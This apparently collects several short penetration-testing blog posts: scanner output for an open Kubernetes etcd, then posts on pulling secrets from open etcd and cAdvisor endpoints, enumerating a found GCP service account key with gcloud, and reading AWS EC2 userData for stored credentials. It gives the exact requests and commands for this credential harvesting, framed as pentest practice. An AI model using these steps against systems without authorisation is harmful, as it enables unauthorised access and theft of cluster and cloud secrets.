~ Discovering Open Kubernetes Services…
|
| Etcd:
|   type: open service
|   service: Etcd
|_  host: 1.2.3.4:2379
|
| Etcd Remote version disclosure:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
|
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote read access might expose to an
|_    attacker cluster’s possible exploits, secrets and more.

———-

Nodes
+————-+—————-+
| TYPE        | LOCATION       |
+————-+—————-+
| Node/Master | 1.2.3.4        |
+————-+—————-+

Detected Services
+———+———————+———————-+
| SERVICE | LOCATION            | DESCRIPTION          |
+———+———————+———————-+
| Etcd    | 1.2.3.4:2379        | Etcd is a DB that    |
|         |                     | stores cluster’s     |
|         |                     | data, it contains    |
|         |                     | configuration and    |
|         |                     | current state        |
|         |                     | information, and     |
|         |                     | might contain        |
|         |                     | secrets              |
+———+———————+———————-+

Vulnerabilities
+————–+——————+———————-+———————+————————–+
| LOCATION     | CATEGORY         | VULNERABILITY        | DESCRIPTION         | EVIDENCE                 |
+————–+——————+———————-+———————+————————–+
| 1.2.3.4:2379 | Unauthenticated  | Etcd is accessible   | Etcd is accessible  | {“etcdserver”:”3.3.9     |
|              | Access           | using insecure       | using HTTP (without | “,”etcdcluster”:”3.3     |
|              |                  | connection (HTTP)    | authorization and   | …                      |
|              |                  |                      | authentication), it |                          |
|              |                  |                      | would allow a       |                          |
|              |                  |                      | potential attacker  |                          |
|              |                  |                      | to                  |                          |
|              |                  |                      |     gain access to  |                          |
|              |                  |                      | the etcd            |                          |
+———————+———————-+———————-+———————-+————–+
| 1.2.3.4:2379 | Information      | Etcd Remote version  | Remote version      | {“etcdserver”:”3.3.9     |
|              | Disclosure       | disclosure           | disclosure might    | “,”etcdcluster”:”3.3     |
|              |                  |                      | give an attacker a  | …                      |
|              |                  |                      | valuable data to    |                          |
|              |                  |                      | attack a cluster    |                          |
+———————+———————-+———————-+———————-+————–+
| 1.2.3.4:2379 | Access Risk      | Etcd Remote Read     | Remote read access  | {“action”:”get”,”nod     |
|              |                  | Access Event         | might expose to an  | e”:{“dir”:true,”node     |
|              |                  |                      | attacker cluster’s  | …                      |
|              |                  |                      | possible exploits,  |                          |
|              |                  |                      | secrets and more.   |                          |
+————–+——————+———————-+———————+————————–+

Share
Categories
Cloud devoops hacking Intelwars Kubernetes Pentesting

Kubernetes: open etcd

Quick post on Kubernetes and open etcd (port 2379)

etcd is a distributed key-value store. In fact, etcd is the primary datastore of Kubernetes; storing and replicating all Kubernetes cluster state. As a critical component of a Kubernetes cluster having a reliable automated approach to its configuration and management is imperative.”

-from: https://coreos.com/blog/introducing-the-etcd-operator.html 

What this means in english is that etcd stores the current state of the Kubernetes cluster usually including the kubernetes tokens and passwords.  If you check out the following references you can get a sense for the pain level that could potentially be involved. At minimum you can get network info or running pods and at best credentials.

refs: 
https://techbeacon.com/hackers-guide-kubernetes-security 
https://elweb.co/the-security-footgun-in-etcd/
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/

the second link talks extensively around types of info the found when they hit all the shodan endpoints for 2379 and did some analysis on the results.

If you manage to find open etcd the easiest way to check for creds is to just do a curl request for:

GET http://ip_address:2379/v2/keys/?recursive=true

Example Loot – 

Usually it’s boring stuff like this:


But occasionally you’ll get more interesting things like:


or more fun things like kublet tokens:



Share
Categories
Cloud devoops hacking Intelwars Kubernetes Pentesting

Kubernetes: cAdvisor

“cAdvisor (Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers.”

runs on port 4194

Links:
https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/
https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/

What do you get?

information disclosure about metrics of the containers.

Example request to hit the API and dump data:

http://1.2.3.4:4194/api/v2.0/spec?recursive=true

Screenshots

Share
Categories
Cloud devoops GCP hacking Intelwars Pentesting

I found a GCP service account token…now what?

Google Cloud Platform (GCP) is rapidly growing in popularity and i haven’t seen too many posts on  f**king it up so I’m going to do at least one 🙂

Google has several ways to do authentication but most likely what you are going to come across shoved into code somewhere or in a dotfiles is a service account json file.

It’s going to look similar to this:

These service account files are similar to AWS tokens in that it can be difficult to determine what they have access to if you don’t already have console and/or IAM access. However with a little bit of scripting we can brute force at least some of the token’s functionality pretty quickly. The issue being service accounts for something like GCP compute looks the same as one you made to manage your calendar or one of the 100’s of other Google services.

You’ll need to install the gcloud tools for you OS. Info here:  https://cloud.google.com/sdk/

Once you have the gcloud suite of tools installed you can auth with the json file with the following command:

gcloud auth activate-service-account –key-file=KEY_FILE

If they key is invalid you’ll see something like the below:

gcloud auth activate-service-account –key-file=21.json
ERROR: (gcloud.auth.activate-service-account) There was a problem refreshing your current auth tokens: invalid_grant: Not a valid email or user ID.

Otherwise it will look similar to below:

gcloud auth activate-service-account –key-file=/Users/CG/Documents/pentest/gcp-weirdaal/gcp.json
Activated service account credentials for: [python@removed.iam.gserviceaccount.com]

you can validate it worked by issuing gcloud auth list command:

gcloud auth list
                  Credentialed Accounts
ACTIVE  ACCOUNT

*       python@removed.iam.gserviceaccount.com

I put together a shell script that runs though a bunch of command to enumerate information. They only you info need to provide is the project name. This can be found in the json file in the project_id  field or by issuing the  gcloud project list command.  Sometimes there are multiple projects associated with an account and you’d need to run the shell script with for each project.
The first time you run these api calls you might need to pass a “Y” to the cli to enable it. you can get around this manual shenanigans by doing a:
yes | ./gcp_enum.sh 
This will answer Yes for you each time 🙂
The script is here: https://gist.github.com/carnal0wnage/757d19520fcd9764b24ebd1d89481541

NCC Group also has two tools you could check out:

https://github.com/nccgroup/G-Scout

and

https://github.com/nccgroup/ScoutSuite

enjoy

CG

Share
Categories
AWS Cloud EC2 Intelwars Pentesting

AWS EC2 instance userData

In the effort to get me blogging again I’ll be doing a few short posts to get the juices flowing (hopefully).

Today I learned about the userData instance attribute for AWS EC2.

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

In general I thought metadata was only things you can hit from WITHIN the instance via the metadata url: http://169.254.169.254/latest/meta-data/

However, if you read the link above there is an option to add metadata at boot time. 

You can also use instance metadata to access user data that you specified when launching your instance. For example, you can specify parameters for configuring your instance, or attach a simple script. 

That’s interesting right?!?!  so if you have some AWS creds the easiest way to check for this (after you enumerate instance IDs) is with the aws cli.

$ aws ec2 describe-instance-attribute –attribute userData –instance-id i-0XXXXXXXX

An error occurred (InvalidInstanceID.NotFound) when calling the DescribeInstanceAttribute operation: The instance ID ‘i-0XXXXXXXX’ does not exist

ah crap, you need the region…

$ aws ec2 describe-instance-attribute –attribute userData –instance-id i-0XXXXXXXX –region us-west-1
{
    “InstanceId”: “i-0XXXXXXXX”,
    “UserData”: {
        “Value”: “bm90IHRvZGF5IElTSVMgOi0p”}

anyway that can get tedious especially if the org has a ton of things running.  This is precisely the reason @cktricky and I built weirdAAL.  Surely no one would be sticking creds into things at boot time via shell scripts 🙂

The module loops trough all the regions and any instances it finds and queries for the userData attribute.  Hurray for automation.

That module is in the current version of weirdAAL. Enjoy.

-CG

Share